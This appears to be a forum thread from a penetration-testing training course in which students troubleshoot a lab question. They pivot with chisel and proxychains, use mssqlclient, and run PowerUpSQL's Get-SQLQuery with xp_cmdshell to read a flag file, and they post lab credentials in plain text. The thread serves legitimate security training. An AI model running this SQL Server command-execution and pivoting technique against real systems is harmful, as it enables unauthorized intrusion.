I was stuck on Q4 for a while and ended up getting the flag through an unintended way. It suggests we use mssqlclient. I’ve tried uploading impacket and installing it but it does not work.

sup man, you resolve it?, im stuck there too

There’s a hacker box you can connect too at .225 using the regular credentials we used before. I did not know this when I first attacked this section.


Thank you, I forgot that and was wondering how to access with my VM, I thought about trying port forwarding, but I was sure it should be an easier way.
They should put that info at the bottom with the exercice instead of in middle of the lesson…

Finally :slight_smile:
–>i transfered mssqlclient.exe To DAMUNDSEN Rdp And Executed Command In Powershell
→ After So Many Hit And Tries Lastly This Worked For Me


Thank you! I was very confused with this section instructions.

It’s normal that mssqlclient doesn’t succeed because the SQL server have a different internal ip address that can’t even be pinged from the attacker, I succeded by pivoting using chisel ( this link is so helpful : Pivoting with Chisel | Ap3x Security , releases : Releases · jpillora/chisel · GitHub ) then proxychains4 -q mssqclient… would do the job. Good luck

That’s a recurrent problem with HTB academy and their weird questionning and hints etc… Too much vague instructions for the labs like this one. Same when you make a get-SQLInstanceDomain it gave me a host name not an ip and in real world we are gonna to use hostname with get-sqlquery when here we use the IP we were given in the question…
And in this module it misses too much info, powerupSQL is enough for the last question for example, there is a Get-SQLQuery…

Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt'''

1 Like

I followed the syntax given in your reply. All I get is the following:

PS C:\tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance “,1433” -username “inlanefreight\damundsen” -password “SQL1234!” -query ‘EXEC xp_cmdshell ‘‘powershell -c cat c:\Users\damundsen\Desktop\flag.txt’’’
VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.
PS C:\tools\PowerUpSQL>

What am I doing wrong??

It is because at the powershell -c you use double quotes when it is 2 simples quotes i think

Tried again your suggestions:

The entry I made is as follows:
PS C:\tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance “,1433” -username “inlanefreight\damundsen” -password “SQL1234!” -query ‘EXEC xp_cmdshell’ ‘powershell -c cat c:\Users\damundsen\Desktop\flag.txt’
VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.

Again I am confused. Any help?

How to transfer to DAMUNDSEN RDP as when you connect to DAMUNDESEN RDP it does not have any powershell or CMD instances

Come on look the end of your query there is only one quotes when you need 3…

Get-SQLQuery -Verbose -Instance “,1433” -username “inlanefreight\damundsen” -password “SQL1234!” -query ‘EXEC xp_cmdshell ‘‘powershell -c cat c:\Users\damundsen\Desktop\flag.txt’’’

The above is what I ran again. Still the same error.

VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.

I am doing something wrong. I am unable to point where this mistake is taking place. I am running Remmina with htb-student/and the corresponding password given

Your problem is still on quotes… you put double quotes before powershell when i told you it is 2 single quotes (one to escape the other…) And at the end it is 3 singles quotes to close the 2 double quotes before powershell and the quote before EXEC at the beginning… Learn how to escape quotes on powershell and apply. A lot of people have problem with this so maybe try with base64 powershell command.

For Question #4 there is a Linux attack box that you can SSH into(like the previous module) once you’ve RDP’d into the host.

open a PowerShell console on MS01 and SSH to with the credentials htb-student:HTB_@cademy_stdnt!

This machine has on it and can interact with INLANEFREIGHT/DAMUNDSEN@

You can then run the commands in the module to get the flag.

Hey buddy, I replicate your Get-SQLQuery example with several permutation without success, also I tried the PS Base64 Encoding, this is what I did, sharing a bit of context:

This is your command suggestion : Get-SQLQuery -Verbose -Instance “,1433” -username “inlanefreight\damundsen” -password “SQL1234!” -query ‘EXEC xp_cmdshell ‘‘powershell -c cat c:\Users\damundsen\Desktop\flag.txt’’’

And this is the output :
VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.

PS Base64 Encoding : Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query JwBFAFgARQBDACAAeABwAF8AYwBtAGQAcwBoAGUAbABsACAAJwAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGMAIABjAGEAdAAgAGMAOgBcAFUAcwBlAHIAcwBcAGQAYQBtAHUAbgBkAHMAZQBuAFwARABlAHMAawB0AG8AcABcAGYAbABhAGcALgB0AHgAdAAnACcAJwA=

Same output. I really would like to grab the Flag with this method, read several documentation with no success either.

Hey @r3l1k, did you get the flag with this command :
Get-SQLQuery -Verbose -Instance “,1433” -username “inlanefreight\damundsen” -password “SQL1234!” -query ‘EXEC xp_cmdshell ‘‘powershell -c cat c:\Users\damundsen\Desktop\flag.txt’’

What host can this user access via WinRM? (just the computer name)

How to find the host?

If some one need help whit the last quest, just RDP as the damunsen user and put the Get-SQLQuery command in powershell. The command doesn’t work in the htb-student RDP session.